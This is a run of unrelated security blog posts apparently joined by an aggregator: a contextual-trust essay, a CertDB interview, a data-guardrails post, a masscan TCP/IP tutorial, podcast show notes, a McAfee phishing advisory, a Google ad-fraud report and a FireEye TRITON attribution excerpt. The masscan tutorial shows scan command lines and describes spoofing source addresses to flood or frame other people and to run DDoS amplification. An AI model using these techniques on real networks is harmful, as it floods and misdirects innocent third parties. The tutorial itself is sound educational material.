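    ("new_friend", "borrow_my_car"): 0.2,
    ("clumsy_friend", "hold_crystal_glass"): 0.1,
}

def trust_for(principal: str, action: str, threshold: float = 0.5) -> bool:
    # Unknown (principal, action) pairs default to no trust.
    return TRUST_SCORES.get((principal, action), 0.0) >= threshold

print(trust_for("new_friend", "drive_me_to_dinner"))  # True
print(trust_for("new_friend", "borrow_my_car"))       # False
```

Note the default: an unknown combination is denied, the opposite of the free-rein-once-inside model just described.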

The way forward is fairly clear – wide adoption of fine-grained, context-sensitive trust is the right approach. Furthermore, this contextual model of trust needs to be applied to more than just people on specific programs, but to every entity that interacts with a system, as well as the system itself.

The only long-term solution to data management is to embrace this contextual-trust-based architecture in a consistent and broad manner. Moving away from the “inside/outside, good/bad” mindset has already started (behavioral analytics are a much needed first step and can be very effective in detecting abuses of granted trust) – and it should be encouraged. What’s needed next is to recognize that trust comes in degrees and to utilize this contextual trust concept to deliver risk-adapting cybersecurity policies. The world really is about shades of grey; treating it that way will enable us to protect the data that is most important to us.

Exclusive Interview with SPYSE team on free security tools and new projects

I don't think many of you have heard of SPYSE (I hadn't before this interview), but let me tell you: they are amazing people and great developers, and believe me when I say they are contributing greatly to the information security community with their tools and projects. I first got interested in them when I checked out the certdb and findsubdomains projects, remarkable sites that I highly recommend taking a look at. I authored reviews of their projects, "CertDB is a free SSL Search Engine" and "Finding Sub-Domains for Open Source Intelligence", and have spoken highly of them. Over the last few days I got a chance to ask them some questions about their project CertDB and their ongoing efforts, and I'm sharing the answers with you all.

What is CERTDB? Is it a project under some company, or a company in itself or an entrepreneurship idea from some smart team? Who's the backbone of CERTDB?

We are the SPYSE team, skilled specialists in the field of web analytics and digital security. In 2017 we formed a unit that develops, on a voluntary basis, non-profit tools and services for the exploration and analysis of data available on the internet. CertDB, an internet-wide search engine for research and analysis of digital certificates, is the first project of that team, whose ambition is to build a search engine across the entire Internet infrastructure for educational, research and practical purposes, one which combines the key capabilities of services such as Censys, Shodan and Domaintools, and significantly exceeds them in terms of data completeness and analytical capabilities. Besides CertDB, our portfolio currently includes FindSubdomains, a service designed to automate subdomain discovery. We are currently working on another project related to DNS, and we plan on releasing one project every month.

The mission of the project lies in blurring the widespread belief that an SSL Certificate is just a minor collection of the data files that digitally bond the cryptographic key to the businesses' details. On the opposite, the creators of CertDB aim to change the nature of things around the average users of the internet.

Future projects include analytic tools for domain/subdomain analysis, IP ranges, DNS addresses, and connections between organizations and their digital assets. In about 4 months, we intend to group these services together to create a search engine that encompasses all of these areas across the entire Internet infrastructure, with a more complete pool of data than any existing resource on the web.

Examples of available queries and CertDB use cases:

  1. A newly issued certificate can reveal the launch of a new service, a merger between organizations, or other market activity faster than any press release.
  2. It is of utmost importance to keep track of SSL certificate expiration times. Once an SSL certificate expires, the consequences can be unpleasant for both the website and the end user: loss of trust, a drop in profits due to abandoned shopping carts, damage to the organization’s image and reputation, and privacy risks.
  3. CertDB is not a mechanism of use only to professionals in the IT field. By exploring SSL certificates, one can analyze the business activity of individual organizations as well as whole industries or markets, and identify trends.
  4. A company under scrutiny may issue a certificate covering the domains of other companies, which could indicate a collaboration or the purchase of one company by another. Such information could generate profits as insider insight, or even lead to the start of an investigation (if there are indications of unfair business practices).
  5. A company specializing in security breaches may use CertDB to research problematic certificates and ultimately weaken the possibility of hacker attacks.
  6. A commercial SSL-selling firm may increase its sales by "warning" companies suffering from affected subdomains and domains.
  7. A company might register a domain hinting at an upcoming initial coin offering. This promising piece of evidence can help with competitive analysis or business analytics, among other things, and gives observers an early signal for potential investment.
  8. The registration of a new unknown domain in Palo Alto may hint at a new start-up; switching from a "Wildcard" certificate to "Let's Encrypt" tells us something about an organization's budget constraints.
  9. Based on the number of SSL certificates issued to domains of a particular country, as well as the number of certificates per capita, one can gauge the maturity of IT infrastructure in different countries.

We are just at the beginning of our journey and would really appreciate any help or assistance – constructive feedback, advice, mentions, coverage options and connections.

Do you have any active market competition, and what is your USP (unique selling point) if there are other players?

CertDB's key selling points:
— it's completely free; we're developing these projects as volunteers for educational and research purposes, so they will be free forever;
— it's the most complete certificate database on the internet;
— it's the most accurate, updated every day by scanning the whole internet;
— CertDB has the best UI, because we care not only about data but about user experience too.

We analyze the web 24/7 to offer you the most complete and up-to-date information about SSL certificates on the internet.

CertDB provides free access to its powerful API. You can use API for practical research or educational purposes, or for implementation of other programs and services.
Our service provides search capabilities by multiple criteria, quality filtering. We also aggregate data by various criteria, which makes it possible to see the picture on a larger scale.
We pay great attention to UX / UI, page load speed and other details, our projects are user-oriented. Our developers constantly investigate behavioral factors and feedback from users in order to make projects better.

In our previous discussion, you mentioned the search/filter capacity of CertDB that makes you different from, let's say, CRT.SH. How about Censys? How do you stack up against them?

Our work on certificates is, at first glance, very similar to Censys's. We proceeded from the same problems faced by developers and experts, so our search mechanisms have a number of similarities. At the same time, we largely sought to build the project so that non-professionals could use it and still obtain valuable information. We understand that this is a complex and lengthy process, but we are deeply committed to bringing the market a product not just for geeks, but for a wide audience.

You mentioned about scanning, and having sensors. How do you categorize or short-list the websites? And, if someone wants to list their website for active monitoring, do you have a SUBMISSION form?

In fact, our team does not deal only with digital certificates, of course. At the moment, we are exploring the web part of the entire IPv4 range using a variety of techniques. A significant part of the data for the starting point of the research was taken from public sources, some was discovered by ourselves, and some is obtained from partners. A SUBMISSION form seems unnecessary to us, because there are hardly any domains that we do not know about.

I checked my website in your database, and it shows my old certificate; how often do you plan to scan websites and do you have a priority criterion for scanning?

In the near future we are preparing infrastructure for regular, systematic scanning of all known points on the Internet. According to our plans, within a month we will be able to update the information for every point that has shown any signs of life in the last 6 months at least every two weeks, and in reality, according to our expectations, much more often.

From a security point of view have you gone through any security testing or assessment in the past, or planned to do so?

The main part of the SPYSE team works in IT security. Project ideas were originally born out of our daily needs. We did and do testing for many companies (under NDA), we have quite a lot of knowledge. However, we distance our current services from our work, we target them for a much wider audience, for educational purposes, to give interested people more opportunities to study the Internet, and researchers to explore and analyze it for free.

If we talk about the security of our projects, then we try to make it right, although we have not focused on security issues separately - we have nothing to steal.

Do you plan to keep the service free, or launch any subscription based, or pricing model for better search, filters etc. in the future?

We plan to keep our services entirely free. We want to believe that our current affairs are useful to people. This motivates us the most. We really want to spread the message about our free services and make them accessible to regular users. Hope that readers of this article can support us in that.

// Keep it up guys, and we are excited for your new projects.

Cover Image Credit: Jonathan Velasquez

Introducing Data Guardrails and Behavioral Analytics: Understand the Mission

Posted under: Research and Analysis

After over 25 years of the modern IT security industry, breaches still happen at an alarming rate. Yes, that’s fairly obvious but still disappointing, given the billions spent every year in efforts to remedy the situation. Over the past decade the mainstays of security controls have undergone the next generation treatment – initially firewalls and more recently endpoint security. New analytical techniques have been mustered to examine infrastructure logs in more sophisticated fashion.

But the industry seems to keep missing the point. The objective of nearly every hacking campaign is (still) to steal data. So why focus on better infrastructure security controls and better analytics of said infrastructure? Mostly because data security is hard. The harder the task, the less likely overwhelmed organizations will have the fortitude to make necessary changes.

To be clear, we totally understand the need to live to fight another day. That’s the security person’s ethos, as it must be. There are devices to clean up, incidents to respond to, reports to write, and new architectures to figure out. The idea of tackling something nebulous like data security, with no obvious solution, can remain a bridge too far.

Or is it? The time has come to revisit data security, and to utilize many of the new techniques pioneered for infrastructure to address the insider threat where it appears: attacking data. So our new series, Protecting What Matters: Introducing Data Guardrails and Behavioral Analytics, will introduce some new practices and highlight new approaches to protecting data.

Before we get started, let’s send a shout-out to Box for agreeing to license this content when we finish up this series. Without clients like Box, who understand the need for forward-looking research to tell you where things are going, not reports telling you where they’ve been, we wouldn’t be able to produce research like this.

Understanding Insider Risk

While security professionals like to throw around the term “insider threat”, it’s often nebulously defined. In reality it includes multiple categories, including external threats which leverage insider access. We believe to truly address a risk you first need to understand it (call us crazy). To break down the first level of the insider threat, let’s consider its typical risk categories:

  1. Accidental Misuse: In this scenario the insider doesn’t do anything malicious, but makes a mistake which results in data loss. For example a customer service rep could respond to an email sent by a customer which includes private account info. It’s not like the rep is trying to violate policy, but they didn’t take the time to look at the message and clear out any private data.
  2. Tricked into Unwanted Actions: Employees are human, and can be duped into doing the wrong thing. Phishing is a great example. Or providing access to a folder based on a call from someone impersonating an employee. Again, this isn’t malicious, but it can still cause a breach.
  3. Malicious Misuse: Sometimes you need to deal with the reality of a malicious insider intentionally stealing data. In the first two categories the person isn’t trying to mask their behavior. In this scenario they are deliberately obfuscating, which means you need different tactics to detect and prevent the activity.
  4. Account Takeover: This category reflects the fact that once an external adversary has presence on a device, they become an ‘insider’; with a compromised device and account, they have access to critical data.

We need to consider these categories in the context of adversaries so you can properly align your security architecture. So who are the main adversaries trying to access your stuff? Some coarse-grained categories follow: unsophisticated attackers (using widely available tools), organized crime, competitors, state-sponsored adversaries, and finally actual insiders. Once you have figured out your most likely adversary and their typical tactics, you can design a set of controls to effectively protect your data.

For example an organized crime faction looks to access data related to banking or personal information for identity theft. But a competitor is more likely looking for product plans or pricing strategies. You can (and should) design your data protection strategy with these likely adversaries in mind, to help prioritize what to protect and how.

Now that you understand your adversaries and can infer their primary tactics, you have a better understanding of their mission. Then you can select a data security architecture to minimize risk, and optimally prevent any data loss. But that requires us to use different tactics than would normally be considered data security.

A New Way to Look at Data Security

If you surveyed security professionals and asked what data security means to them, they’d likely say either encryption or Data Loss Prevention (DLP). When all you have is a hammer, everything looks like a nail, and for a long time those two have been the hammers available to us. Of course the fact that we want to expand our perspective a bit doesn’t mean DLP and encryption no longer have any roles to play in data protection. Of course they do. But we can supplement them with some new tactics.

  • Data Guardrails: We have defined Guardrails as a means to enforce best practices without slowing down or impacting typical operations. Typically used within the context of cloud security (like, er, DisruptOps), a data guardrail enables data to be used in certain ways while blocking unauthorized usage. To bust out an old network security term, you can think of guardrails as like “default-deny” for data. You define the set of acceptable practices, and don’t allow anything else.
  • Data Behavioral Analytics: Many of you have heard of UBA (User Behavioral Analytics), where all user activity is profiled, and you then look for anomalous activities which could indicate one of the insider risk categories above. What if you turned UBA inside-out and focused on the data? Using similar analytics you could profile the usage of all the data in your environment, and then look for abnormal patterns which warrant investigation. We’ll call this DataBA because your database administrators might be a little peeved if we horned in on their job title.
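The "default-deny for data" idea behind Data Guardrails can be sketched as a toy policy check. The roles, actions, and data classes below are invented for illustration, not drawn from any product:

```python
# Default-deny guardrail sketch: only explicitly allowed combinations of
# (role, action, data_class) pass; everything else is blocked by default.
ALLOWED_USES = {
    ("customer_service", "read", "account_summary"),
    ("analyst", "read", "aggregated_metrics"),
}

def guardrail_permits(role: str, action: str, data_class: str) -> bool:
    return (role, action, data_class) in ALLOWED_USES

print(guardrail_permits("customer_service", "read", "account_summary"))    # True
print(guardrail_permits("customer_service", "export", "account_summary"))  # False
```

A real guardrail would also constrain destinations and contexts, but the default-deny shape is the point: you enumerate acceptable uses and everything else is blocked without slowing down normal work.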

Our next post will dig further into these new concepts of Data Guardrails and DataBA, to illuminate both the approaches and their pitfalls.

- Mike Rothman

Masscan as a lesson in TCP/IP

When learning TCP/IP it may be helpful to look at the masscan port scanning program, because it contains its own network stack. This concept, "contains its own network stack", is so unusual that it will help resolve some confusion you might have about networking and challenge some incorrect assumptions you may have developed about how networks work.
For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has its own IP address, but masscan runs with a different one. This works fine, with the program contacting the target computer and downloading information -- even though it has the "wrong" IP address. That's because it isn't using the network stack of the notebook computer, and hence not using the notebook's IP address. Instead, it has its own network stack and its own IP address.

At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information.
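At its simplest, "which ports are open" can be probed with an ordinary connect() call. The sketch below is a minimal illustration that goes through the operating system's own network stack; masscan, by contrast, crafts raw packets from its own stack, which is how it reaches such high rates:

```python
# Minimal connect()-style port check. This uses the operating system's
# TCP stack; masscan instead sends raw SYN packets from its own stack.
import socket

def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    try:
        # connect() completes only if something is listening on (host, port)
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

A full scanner loops this over many hosts and ports; because each connect() holds kernel state, this approach tops out far below masscan's stateless packet rates, but it shows what "port is open" means.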

In the above example, the parameters to masscan used here are:
  • -p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol
  • --banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.
  • --source-ip : this configures the IP address that masscan will use
  • the final parameter is the target to be scanned. This happens to be a Google server, by the way, though that's not really important.
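To illustrate what a banner check amounts to for HTTP (a simplified sketch, not masscan's actual banner code), you can open a connection, send a minimal request, and pull out the status line, headers, and the HTML title:

```python
# Simplified HTTP banner grab: connect, send a minimal request, and
# extract the response headers and the HTML <title>. Illustrative only;
# masscan does this statelessly inside its own TCP stack.
import re
import socket

def grab_http_banner(host: str, port: int = 80) -> dict:
    request = f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(request)
        raw = b""
        while chunk := s.recv(4096):   # HTTP/1.0: server closes when done
            raw += chunk
    head, _, body = raw.partition(b"\r\n\r\n")
    match = re.search(rb"<title[^>]*>(.*?)</title>", body, re.S | re.I)
    return {
        "headers": head.decode(errors="replace"),
        "title": match.group(1).strip().decode(errors="replace") if match else None,
    }
```

The returned headers correspond to what masscan reports with --banners for HTTP; other protocols (SSH, FTP, SMTP) have their own banner formats.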
Now let's change the IP address that masscan is using to something completely different, an address on some other network. The difference from the above screenshot is that we no longer get any data in response. Why is that?

The answer is that the routers don't know how to send back the response. It doesn't go to me; it goes to whoever owns the real address. If you visualize the Internet, the subnetworks are on the edges. The routers in between examine the destination address of each packet and route it in the proper direction. You can send packets from any address from anywhere in the network, but responses will always go back to the proper owner of that address.

Thus, masscan can spoof any address it wants, but if it's an address that isn't on the local subnetwork, then it's never going to see the response -- the response is going to go back to the real owner of the address. By the way, I've made this mistake before. When doing massive scans of the Internet, generating billions of packets, I've accidentally typed the wrong source address. That meant I saw none of the responses -- but the hapless owner of that address was inundated with replies. Oops.

So let's consider what masscan does when you use --source-ip to set its address. It does only three things:
  • Uses that as the source address in the packets it sends.
  • Filters incoming packets to make sure they match that address.
  • Responds to ARP packets for that address.
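That third step, responding to ARP, is simple enough to sketch in full. Below is a hypothetical Python illustration of the wire format (masscan itself is written in C, so this is not its actual code); the MAC addresses are taken from the example above, while the IP values are placeholders:

```python
import struct

def arp_reply(my_mac: bytes, my_ip: bytes, asker_mac: bytes, asker_ip: bytes) -> bytes:
    """Build an Ethernet frame answering 'who has my_ip?' with my_mac."""
    eth = asker_mac + my_mac + b"\x08\x06"        # dst MAC, src MAC, EtherType=ARP
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4,            # htype=Ethernet, ptype=IPv4, addr lengths
                      2,                          # opcode 2 = ARP reply
                      my_mac, my_ip,              # sender: the address being claimed
                      asker_mac, asker_ip)        # target: whoever asked
    return eth + arp

# MAC addresses from the example above; the IPs are placeholder values.
frame = arp_reply(bytes.fromhex("1463a3112dd4"), bytes([192, 0, 2, 99]),
                  bytes.fromhex("ac86747828b2"), bytes([192, 0, 2, 1]))
```

The entire reply fits in a single 42-byte frame, which is why "owning" an IP address on the local network requires so little machinery.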
Remember that on the local network, communication isn't between IP addresses but between Ethernet/WiFi addresses. IP addresses are for remote ends of the network, MAC addresses are how packets travel across the local network. It's like when you send your kid to grab the mail from the mailbox: the kid is Ethernet/WiFi, the address on the envelope is the IP address.

In this case, when masscan transmits packets to the local router, it needs to first use ARP to find the router's MAC address. Likewise, when the router receives a response from the Internet destined for masscan, it must first use ARP to discover the MAC address masscan is using.

As you can see in the picture at the top of this post, the MAC address of the notebook computer's WiFi interface is 14:63:a3:11:2d:d4. Therefore, when masscan sees an ARP request for, it must respond back with that MAC address.

These three steps should impress upon you that there's not actually a lot that any operating system does with the IP address assigned to it. We imagine there is a lot of complicated code involved. In truth, there isn't -- there are only a few simple things the operating system does with the address.

Moreover, this should impress upon you that the IP address is a property of the network not of the operating system. It's what the network uses to route packets to you, and the operating system has very little control over which addresses will work and which ones don't. The IP address isn't the name or identity of the operating system. It's like how your postal mailing address isn't you, isn't your identity, it's simply where you live, how people can reach you.

Another thing to notice is the difference between phone numbers and IP addresses. Your IP address depends upon your location. If you move your laptop computer to a different location, you need a different IP address that's meaningful for that location. In contrast, a phone has the same phone number wherever you travel in the world, even overseas. There have been decades of work on "mobile IP" to change this, but frankly, the Internet's design is better, though that's beyond the scope of this document.

That you can set any source address in masscan means you can play tricks on people. Spoof the source address of some friend you don't like, and they'll get all the responses. Moreover, angry people who don't like getting scanned may complain to their ISP and get them kicked off for "abuse".

To stop this sort of nonsense, a lot of ISPs do "egress filtering". Normally, a router only examines the destination address of a packet in order to figure out the direction to route it. With egress filtering, it also looks at the source address and makes sure it can route responses back to it. If not, it'll drop the packet. I tested this by sending packets with such spoofed addresses to a server of mine on the Internet, and found that I did not receive them. (I used the famous tcpdump program to filter incoming traffic, looking for those packets.)
By the way, masscan also has to ARP the local router in order to find its MAC address before it can start sending packets to it. The first thing it does when it starts up is ARP the local router. That's the reason there's a short delay when starting the program. You can bypass this ARP step by setting the router's MAC address manually.

First of all, you have to figure out the local router's MAC address. There are many ways of doing this, but the easiest is to run the arp command from the command-line, asking the operating system for this information. The operating system, too, must ARP the router to learn its MAC address, and it keeps this information in a table.
Then, I can run masscan using this MAC address:

    masscan --interface en0 --router-mac ac:86:74:78:28:b2 --source-ip ....

In the above examples, while masscan has its own stack, it still requests information about the operating system's configuration, to find things like the local router. Instead of doing this, we can run masscan completely independently from the operating system, specifying everything on the command line.

To do this, we have to configure all the following properties of a packet:
  • the network interface of my MacBook computer that I'm using
  • the destination MAC address of the local router
  • the source MAC address of my MacBook computer
  • the destination IP address of the target I'm scanning
  • the source IP address that the target will respond to
  • the destination port number of the port I am scanning
  • the source port number of the connection
An example is shown below. When I generated these screenshots I was located on a different network, so the local addresses have changed from the examples above. Here is a screenshot of running masscan:
And here is a screenshot from Wireshark, a packet sniffer, that captures the packets involved:
As you can see from Wireshark, the very first packet is sent without any preliminaries, based directly on the command-line parameters. There is no other configuration of the computer or network involved.

When the response packet comes back, the local router has to figure out the MAC address of where to send it, so it sends an ARP request in packet #2, to which masscan responds in packet #3, after which the incoming response can successfully be forwarded as packet #4.

After this, the TCP connection proceeds as normal, with a three-way handshake, an HTTP request, an HTTP response, and so forth, along with a couple of extra ACK packets (noted in red) that happen because masscan is a bit delayed in responding to things.

What I'm trying to show here is again that what happens on the network, the packets that are sent, and how things deal with them, is a straightforward function of the initial starting conditions.

One thing about this example is that I had to set the source MAC address to be the same as my laptop's. That's because I'm using WiFi. There's actually a bit of invisible setup here where my laptop must associate with the access-point. The access-point only knows the MAC address of the laptop, so that's the MAC address masscan must use. Had this been Ethernet instead of WiFi, this invisible step wouldn't be necessary, and I would be able to spoof any MAC address. In theory, I could also add a full WiFi stack to masscan so that it could create its own independent association with the access-point, but that'd be a lot of work.

Lastly, masscan supports a feature where you can specify a range of source IP addresses. This is useful for a lot of reasons, such as stress-testing networks. An example:

    masscan --source-ip ....

For every probe, it'll choose a random IP address from that range. If you really don't like somebody, you can use masscan to flood them with packets whose spoofed source addresses span that entire range. It's one of the many "stupid pet tricks" you can do with masscan that have no purpose, but which come from a straightforward application of the principles of manually configuring things.
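The per-probe random choice amounts to nothing more than picking a random index into the range. A hypothetical Python sketch of that behavior (the range here is a placeholder documentation block):

```python
import random
from ipaddress import ip_address, ip_network

def random_source(cidr: str) -> str:
    """Choose a uniformly random source address from a CIDR range, per probe."""
    net = ip_network(cidr)
    return str(net[random.randrange(net.num_addresses)])

net = ip_network("203.0.113.0/24")
picks = [random_source("203.0.113.0/24") for _ in range(100)]
```

Each transmitted probe simply calls this once more, so no state needs to be kept about which source addresses have already been used.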

Likewise, masscan can be used in DDoS amplification attacks. Just as you can configure addresses, you can configure payloads. Thus, you can set the --source-ip to that of your victim, a list of destination addresses consisting of amplifiers, and a payload that triggers the amplification. The victim will then be flooded with responses. It's not something the program is specifically designed for, but a usage that I can't prevent, as again, it's a straightforward application of the basic principles involved.


Learning about TCP/IP networking leads to confusion about the boundaries between what the operating system does and what the network does. Playing with masscan, which has its own network stack, helps clarify this.

You can download masscan source code at:

Risky Business #519 — ’90s IRC war between US and Russia intensifies

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • CYBERCOM doxing Russian operators. No, really.
  • Arrest over Russian midterm info-op
  • Bloomberg dumpster fire is now a tyre fire
  • Equifax insider sentenced for insider trading
  • Twitter releases bot dataset
  • Saudi insider responsible for 2015 Twitter breach
  • Trisis/Triton now linked to Russia
  • Kaspersky doxes NSA op
  • Risky Business cited by Senate Estimates, AA Bill faces possible delay
  • Much, much more!

This week’s show is sponsored by Cylance, and this week’s sponsor interview is with Josh Lemos.

That’s an interesting chat – Cylance has succeeded in applying machine learning to classifying binaries, but what next? Where does it make sense to apply machine learning next, from their point of view? As you’ll hear, a binary classifier is one thing, but applying ML to something like endpoint detection and response or network traffic is actually a lot more complicated.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

U.S. Begins First Cyberoperation Against Russia Aimed at Protecting Elections - The New York Times
Russian woman charged with attempted meddling in upcoming U.S. midterms
Apple CEO Tim Cook Is Calling For Bloomberg To Retract Its Chinese Spy Chip Story
Amazon exec joins Apple in calling for a retraction of Bloomberg’s explosive microchip spying report | Business Insider
Coats: ODNI has seen 'no evidence' of supply chain hack detailed in Bloomberg story
Super Micro trashes Bloomberg chip hack story in recent customer letter | ZDNet
Equifax engineer who designed breach portal gets 8 months of house arrest for insider trading | ZDNet
Twitter publishes dump of accounts tied to Russian, Iranian influence campaigns | Ars Technica
A Twitter employee groomed by the Saudi government prompted 2015 state-sponsored hacking warning | TechCrunch
FireEye links Russian research lab to Triton ICS malware attacks | ZDNet
Kaspersky says it detected infections with DarkPulsar, alleged NSA malware | ZDNet
Patrick ☠️SMBv1☠️ Gray on Twitter: "Risky Biz gets a shout out in senate estimates... 2018 is weird.… "
Magecart group leverages zero-days in 20 Magento extensions | ZDNet
WordPress team working on "wiping older versions from existence on the internet" | ZDNet
loses $7.5Mil worth of cryptocurrency in mysterious cold wallet hack | ZDNet
Hackers steal data of 75,000 users after FFE breach | ZDNet
Lawfare editor on persistent DDoS attack: 'We wish they'd knock it off'
Vendors confirm products affected by libssh bug as PoC code pops up on GitHub | ZDNet
Advertisers can track users across the Internet via TLS Session Resumption | ZDNet
Open source web hosting software compromised with DDoS malware | ZDNet
Legal and Constitutional Affairs Legislation Committee_2018_10_22_6688.pdf
I forgot to talk about this in the show... this week's sponsor guest recommends people interested in machine learning check out the papers and slide decks here:
CylanceOPTICS | Products | Cylance

New Wave of Browser Hijackers and How to Protect Your Environment

We recently received customer submissions related to a phishing campaign that was redirecting users to a browser hijacker. After analysis, it became clear that these cases were related to a technical support scam in which the attacker uses scare tactics (such as displaying fake error messages and phone numbers) to trick users into believing they are infected with malware and into paying for unnecessary technical support. This is relevant to both consumer and corporate users, since businesses rely heavily on email, and phishing emails are a major contributor to security breaches.

As shown in the picture below, the user receives an email asking them to click on a box to display a message. When the user clicks the message, they are redirected to a URL prompting for user credentials.

The malicious URL is revealed by hovering over the message box, as shown in the screenshot below. These URLs tend to be available for a short time and are frequently changed in the phishing email.

The user may be redirected to a website like the one displayed below. Users may be tricked into providing their credentials.

This behavior resembles ransomware, since the user is unable to exit the browser as it enters full-screen mode. The user may also hear audio, which has also been observed with some ransomware variants. If you are unable to close the tab or the browser, open the task manager using Ctrl + Alt + Delete, locate the browser, and then terminate the process.

The screenshot below illustrates another example with some slight changes.

All domains involved in this campaign were purchased from Namecheap. The email accounts used to propagate this phishing attack are legitimate accounts that were compromised. Email hashes cannot be provided since they contain customer information.

How does McAfee protect users from technical support scam threats?

The malicious HTML embedded in the email has DAT coverage as “” and it is included in current DATs. Users can also use a combination of other McAfee products to protect their environment and their employees. Some of the products available are McAfee SiteAdvisor and McAfee Security for Microsoft Exchange.

McAfee SiteAdvisor

By using McAfee SiteAdvisor, an administrator can collect the malicious URLs and add them to the blocked sites list. This prevents other users from mistakenly providing their credentials if they receive the phishing email.

This can be achieved by accessing the Block and Allow List Policy in McAfee ePolicy Orchestrator (McAfee ePO) and adding the URL as illustrated below.

McAfee Endpoint Security 10.5 product guide:

McAfee Security for Microsoft Exchange

McAfee Security for Microsoft Exchange can be used to block the sender's email address and prevent the phishing email from being sent to additional employees. This variant was taking advantage of a local user account to send the phishing emails. By using McAfee Security for Microsoft Exchange, administrators can blacklist the sending addresses so that they can no longer deliver malicious emails to users.

McAfee Security for Microsoft Exchange 8.6.0 product guide:

What else can you do?

Any suspicious URL can also be checked on the TrustedSource site. This helps determine whether McAfee is aware of the URL and already providing coverage, as illustrated below.

The URLs associated with this phishing attack have been classified as high risk in TrustedSource and McAfee SiteAdvisor.

How do I submit a malicious URL to McAfee?

Send an email to and they will gladly work with you.


For more information on phishing attacks, please visit the following links:

Knowledge Center article: How to recognize and protect yourself from phishing

Blog: How to Spot Phishing Lures

Blog: Don’t get hooked – phishing email advice for your employees

The post New Wave of Browser Hijackers and How to Protect Your Environment appeared first on McAfee Blogs.

Google tackles new ad fraud scheme

Fighting invalid traffic is essential for the long-term sustainability of the digital advertising ecosystem. We have an extensive internal system to filter out invalid traffic – from simple filters to large-scale machine learning models – and we collaborate with advertisers, agencies, publishers, ad tech companies, research institutions, law enforcement and other third party organizations to identify potential threats. We take all reports of questionable activity seriously, and when we find invalid traffic, we act quickly to remove it from our systems.

Last week, BuzzFeed News provided us with information that helped us identify new aspects of an ad fraud operation across apps and websites that were monetizing with numerous ad platforms, including Google. While our internal systems had previously caught and blocked violating websites from our ad network, in the past week we also removed apps involved in the ad fraud scheme so they can no longer monetize with Google. Further, we have blacklisted additional apps and websites that are outside of our ad network, to ensure that advertisers using Display & Video 360 (formerly known as DoubleClick Bid Manager) do not buy any of this traffic. We are continuing to monitor this operation and will continue to take action if we find any additional invalid traffic.

While our analysis of the operation is ongoing, we estimate that the dollar value of impacted Google advertiser spend across the apps and websites involved in the operation is under $10 million. The majority of impacted advertiser spend was from invalid traffic on inventory from non-Google, third-party ad networks.

A technical overview of the ad fraud operation is included below.

Collaboration throughout our industry is critical in helping us to better detect, prevent, and disable these threats across the ecosystem. We want to thank BuzzFeed for sharing information that allowed us to take further action. This effort highlights the importance of collaborating with others to counter bad actors. Ad fraud is an industry-wide issue that no company can tackle alone. We remain committed to fighting invalid traffic and ad fraud threats such as this one, both to protect our advertisers, publishers, and users, as well as to protect the integrity of the broader digital advertising ecosystem.
Technical Detail
Google deploys comprehensive, state-of-the-art systems and procedures to combat ad fraud. We have made and continue to make considerable investments to protect our ad systems against invalid traffic.

As detailed above, we’ve identified, analyzed and blocked invalid traffic associated with this operation, both by removing apps and blacklisting websites. Our engineering and operations teams, across various organizations, are also taking systemic action to disrupt this threat, including the takedown of command and control infrastructure that powers the associated botnet. In addition, we have shared relevant technical information with trusted partners across the ecosystem, so that they can also harden their defenses and minimize the impact of this threat throughout the industry.

The BuzzFeed News report covers several fraud tactics (both web and mobile app) that are allegedly utilized by the same group. The web-based traffic is generated by a botnet that Google and others have been tracking, known as “TechSnab.” The TechSnab botnet is a small to medium-sized botnet that has existed for a few years. The number of active infections associated with TechSnab was reduced significantly after the Google Chrome Cleanup tool began prompting users to uninstall the malware.

In similar fashion to other botnets, this one operates by creating hidden browser windows that visit web pages to inflate ad revenue. The malware contains common IP-based cloaking, data obfuscation, and anti-analysis defenses. This botnet drove traffic to a ring of websites created specifically for this operation, and monetized with Google and many third-party ad exchanges. As mentioned above, we began taking action on these websites earlier this year.

Based on analysis of historical ads.txt crawl data, inventory from these websites was widely available throughout the advertising ecosystem, and as many as 150 exchanges, supply-side platforms (SSPs) or networks may have sold this inventory. The botnet operators had hundreds of accounts across 88 different exchanges (based on accounts listed with “DIRECT” status in their ads.txt files).

This fraud primarily impacted mobile apps. We investigated those apps that were monetizing via AdMob and removed those that were engaged in this behavior from our ad network. The traffic from these apps seems to be a blend of organic user traffic and artificially inflated ad traffic, including traffic based on hidden ads. Additionally, we found the presence of several ad networks, indicating that it's likely many were being used for monetization. We are actively tracking this operation, and continually updating and improving our enforcement tactics.

TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers


In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility. We now track this activity set as TEMP.Veles. In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute.

TRITON Intrusion Demonstrates Russian Links; Likely Backed by Russian Research Institute

FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post. We present as much public information as possible to support this assessment, but withheld sensitive information that further contributes to our high confidence assessment.

  1. FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
  2. Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
  3. An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
  4. Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
